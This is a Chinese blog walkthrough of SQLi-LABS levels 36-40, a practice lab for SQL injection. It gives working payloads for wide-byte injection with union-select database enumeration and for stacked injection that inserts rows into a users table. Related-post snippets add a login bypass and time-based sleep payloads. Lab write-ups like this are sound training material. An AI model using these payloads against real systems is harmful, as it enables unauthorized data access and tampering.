SQLi-LABS 通关攻略【36-40】

最新推荐文章于 2024-10-03 20:57:12 发布
最新推荐文章于 2024-10-03 20:57:12 发布
阅读量474 收藏 10
点赞数 4
分类专栏: SQLi-LABS通关攻略 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141608254
版权

SQLi-LABS 36关

1.本关依旧是宽字节注入

2.测试闭合方式

?id=1                               //正常显示

?id=1'                              //显示错误

?id=1%df'                        //显示错误

?id=1%df' --+                   //显示正常

3.测试回显点

?id=-1%df%27%20union%20select%201,2,3--+

4.使用union select查询数据库名

?id=-1%df%27%20union%20select%201,database(),3--+

SQLi-LABS 37关

1.本关又是post传参,所以需要抓包

 用户名密码分别输入1,进行抓包,然后发送到重放器

 在用户名处进行闭合测试

2.测试之后得到闭合方式为

1%df' --+

3.测试回显点

4.爆数据库名

SQLi-LABS 38关

1.本关使用常规的联合查询方式就可以秒了

但是这关本意是想考差堆叠注入

堆叠注入就是将两个sql语句使用分号隔开,但是依旧执行两条语句

所以,我们这里使用堆叠注入

2.首先测试闭合方式

单引号闭合

3.其次测试是否存在堆叠注入

测试方法就是我们往数据库中插入一条信息,看看是否访问的到

使用语句:

?id=-1';insert into users(id,username,password) values('77','czx','333')--+

 我们这里插入了id为77的信息,接下来输入id=77看是否能够查询到这条信息

结果显而易见,存在堆叠注入

SQLi-LABS 39关

和38关一样,都是堆叠注入,只是变成了数字型

当然,联合注入等常规方式也是可以的

SQLi-LABS 40关

1.依旧是堆叠注入

2.测试闭合

?id=1'           //无回显

?id=1'--+      //依旧没有回显

?id=1')--+     //回显正常

所以是')--+闭合方式

  3.使用insert进行测试是否存在堆叠注入

?id=-1'); insert into users values ('88','xx','88')--+

查询id为88的信息

插入成功,存在堆叠注入

Zhong-Xin
关注
专栏目录
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs通关攻略
网安小白
07-22 376
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
sqli-labs靶场通关攻略
test_zpx的博客
08-14 480
Good Good Study,Day Day Up!
sqli-labs通关lesson36-40
m0_62207170的博客
03-06 312
sqli-labs通关
SQLi-LABS通关攻略【26-30关】
qq_65852138的博客
08-25 673
SQLi-LABS通关攻略【26-30关】
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 681
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
sqli-labs通关教程
m0_65150886的博客
01-23 1631
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs 通关手册
ttytaaa的博客
05-18 1418
(length(database())) =9 or if(1=1, sleep(3), null) or '1' = '1 #'语句中三个条件都为逻辑或 当第一个条件不成功时,再执行第二个条件,第二个条也不成功时,则执行第三个。(length(database())) =9 条件不成功,而后执行了 if(1=1, sleep(3), null)条件,该条件中的判断为 1=1,结果永远都是为真的,而后执行 sleep(3),最终页面响应时间是 3 秒。1一个新的类型注入,使用?
sqli-labs-master靶场通关
m0_75208155的博客
08-12 889
sqli-labs-master靶场通关
sqli-labs通关(1-20)
weixin_57827781的博客
05-18 1590
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql注入
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1909
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1436
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 737
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
实用SQL小总结
UntifA的博客
09-29 1324
SQL记录
【2024】基于mysqldump的数据备份与恢复
最新发布
皮皮的博客
10-03 328
本文记录了mysqldump对于MySQL数据库的备份与恢复用法
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 535
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 720
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 257
Wintergrasp 冬拥湖 120 VS 120
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值